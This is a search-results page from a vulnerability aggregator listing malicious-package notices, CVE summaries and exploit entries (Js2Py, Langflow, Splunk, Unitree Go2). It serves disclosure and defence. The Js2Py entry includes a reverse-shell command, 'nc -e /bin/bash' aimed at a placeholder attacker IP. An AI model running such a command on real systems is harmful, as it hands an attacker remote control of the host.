Lucene search
K

46 matches found

OSSF Malicious Packages
OSSF Malicious Packages
added 2026/07/01 8:5 p.m.8 views

Malicious code in twrap-tool (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d9903cc9163ada9951dee4ee1f364648cac0e492df9a32582ad3ed8303d29231 twraptool/init.py defines two public functions, formatblock and aligncolumns, whose real behavior is to fetch a Python file from...

6.1AI score
Exploits0References2
EUVD
EUVD
added 2026/05/27 8:48 p.m.15 views

EUVD-2026-32664

claude-code-cache-fix is a cache optimization proxy for Claude Code. From 3.5.0 to before 3.5.2, tools/quota-statusline.sh introduced in v3.5.0 interpolates Claude Code's hook stdin payload directly into a Python triple-quoted string literal. A ''' byte sequence in any user-controlled field of th...

8.6CVSS5.9AI score0.00188EPSS
Exploits1References3
Exploit DB
Exploit DB
added 2026/04/30 12:0 a.m.83 views

Js2Py 0.74 - RCE

Exploit Title: Js2Py 0.74 - RCE Date: 2026-02-03 Exploit Author: Ali Sünbül xeloxa Author Page: https://github.com/xeloxa Vendor Homepage: https://github.com/PiotrDabkowski/Js2Py Software Link: https://pypi.org/project/Js2Py/ Version: payload.js python3 exploit.py -c "nc -e /bin/bash 10.10.10.10...

5.3CVSS6.6AI score0.04548EPSS
Exploits22
GithubExploit
GithubExploit
added 2026/04/08 6:56 a.m.130 views

Exploit for Eval Injection in Langflow

CVE-2026-33017 - Langflow Unauthenticated RCE...

9.8CVSS6.4AI score0.98191EPSS
Exploits20
Snyk
Snyk
added 2026/03/20 10:0 p.m.5 views

Embedded Malicious Code

Overview Affected versions of this package are vulnerable to Embedded Malicious Code. The publishing pipeline of this package was compromised as the result of Trivy's GitHub Actions compromise and a malicious versions were released on NPM. They contain malicious code, and its content was NOT yet...

9.8CVSS5.8AI score
Exploits0References2
Snyk
Snyk
added 2026/03/20 10:0 p.m.7 views

Embedded Malicious Code

Overview Affected versions of this package are vulnerable to Embedded Malicious Code. The publishing pipeline of this package was compromised as the result of Trivy's GitHub Actions compromise and a malicious versions were released on NPM. They contain malicious code, and its content was NOT yet...

9.8CVSS5.8AI score
Exploits0References2
Snyk
Snyk
added 2026/03/20 10:0 p.m.36 views

Embedded Malicious Code

Overview Affected versions of this package are vulnerable to Embedded Malicious Code. The publishing pipeline of this package was compromised as the result of Trivy's GitHub Actions compromise and a malicious versions were released on NPM. They contain malicious code, and its content was NOT yet...

9.8CVSS5.8AI score
Exploits0References2
Snyk
Snyk
added 2026/03/20 10:0 p.m.4 views

Embedded Malicious Code

Overview Affected versions of this package are vulnerable to Embedded Malicious Code. The publishing pipeline of this package was compromised as the result of Trivy's GitHub Actions compromise and a malicious versions were released on NPM. They contain malicious code, and its content was NOT yet...

9.8CVSS5.8AI score
Exploits0References2
Snyk
Snyk
added 2026/03/20 10:0 p.m.4 views

Embedded Malicious Code

Overview Affected versions of this package are vulnerable to Embedded Malicious Code. The publishing pipeline of this package was compromised as the result of Trivy's GitHub Actions compromise and a malicious versions were released on NPM. They contain malicious code, and its content was NOT yet...

9.8CVSS5.8AI score
Exploits0References2
Snyk
Snyk
added 2026/03/20 10:0 p.m.9 views

Embedded Malicious Code

Overview Affected versions of this package are vulnerable to Embedded Malicious Code. The publishing pipeline of this package was compromised as the result of Trivy's GitHub Actions compromise and a malicious versions were released on NPM. They contain malicious code, and its content was NOT yet...

9.8CVSS5.8AI score
Exploits0References2
Snyk
Snyk
added 2026/03/19 11:0 p.m.4 views

Embedded Malicious Code

Overview Affected versions of this package are vulnerable to Embedded Malicious Code. The publishing pipeline of this package was compromised as the result of Trivy's GitHub Actions compromise and a malicious versions were released on NPM. They contain malicious code, and its content was NOT yet...

9.8CVSS5.8AI score
Exploits0References2
Snyk
Snyk
added 2026/03/19 11:0 p.m.9 views

Embedded Malicious Code

Overview @emilgroup/commission-sdk-node is an A new version of the package Affected versions of this package are vulnerable to Embedded Malicious Code. The publishing pipeline of this package was compromised as the result of Trivy's GitHub Actions compromise and a malicious versions were released...

9.8CVSS5.8AI score
Exploits0References2
Snyk
Snyk
added 2026/03/19 11:0 p.m.7 views

Embedded Malicious Code

Overview Affected versions of this package are vulnerable to Embedded Malicious Code. The publishing pipeline of this package was compromised as the result of Trivy's GitHub Actions compromise and a malicious versions were released on NPM. They contain malicious code, and its content was NOT yet...

9.8CVSS5.8AI score
Exploits0References2
Snyk
Snyk
added 2026/03/19 11:0 p.m.6 views

Embedded Malicious Code

Overview Affected versions of this package are vulnerable to Embedded Malicious Code. The publishing pipeline of this package was compromised as the result of Trivy's GitHub Actions compromise and a malicious versions were released on NPM. They contain malicious code, and its content was NOT yet...

9.8CVSS5.8AI score
Exploits0References2
Snyk
Snyk
added 2026/03/19 11:0 p.m.7 views

Embedded Malicious Code

Overview Affected versions of this package are vulnerable to Embedded Malicious Code. The publishing pipeline of this package was compromised as the result of Trivy's GitHub Actions compromise and a malicious versions were released on NPM. They contain malicious code, and its content was NOT yet...

9.8CVSS5.8AI score
Exploits0References2
Snyk
Snyk
added 2026/03/19 11:0 p.m.10 views

Embedded Malicious Code

Overview Affected versions of this package are vulnerable to Embedded Malicious Code. The publishing pipeline of this package was compromised as the result of Trivy's GitHub Actions compromise and a malicious versions were released on NPM. They contain malicious code, and its content was NOT yet...

9.8CVSS5.8AI score
Exploits0References2
Snyk
Snyk
added 2026/03/19 11:0 p.m.4 views

Embedded Malicious Code

Overview Affected versions of this package are vulnerable to Embedded Malicious Code. The publishing pipeline of this package was compromised as the result of Trivy's GitHub Actions compromise and a malicious versions were released on NPM. They contain malicious code, and its content was NOT yet...

9.8CVSS5.8AI score
Exploits0References2
NVD
NVD
added 2026/02/26 8:31 p.m.14 views

CVE-2026-27509

Unitree Go2 firmware versions V1.1.7 through V1.1.9, and V1.1.11 EDU do not implement DDS authentication or authorization for the Eclipse CycloneDDS topic rt/api/programmingactuator/request handled by actuatormanager.py. A network-adjacent, unauthenticated attacker can join DDS domain 0 and publi...

8.5CVSS0.00481EPSS
Exploits1References3
GithubExploit
GithubExploit
added 2026/02/24 4:13 p.m.197 views

Exploit for CVE-2025-30401

👻 GhostPort: WhatsApp Web Stager PoC 📌 Project Overview GhostP...

6.7CVSS6AI score0.21096EPSS
Exploits1
Packet Storm
Packet Storm
added 2026/01/21 12:0 a.m.192 views

📄 Splunk Enterprise 8.2.9 / 9.0.2 Remote Code Execution

This Metasploit module exploits a remote code execution vulnerability in Splunk Enterprise. An attacker can inject arbitrary Python code into style parameters, such as the fillColor or lineColor of a sparkline element within a Splunk SimpleXML dashboard. The malicious code is executed when a user...

8.8CVSS6.7AI score0.14314EPSS
Exploits5
Rows per page
Query Builder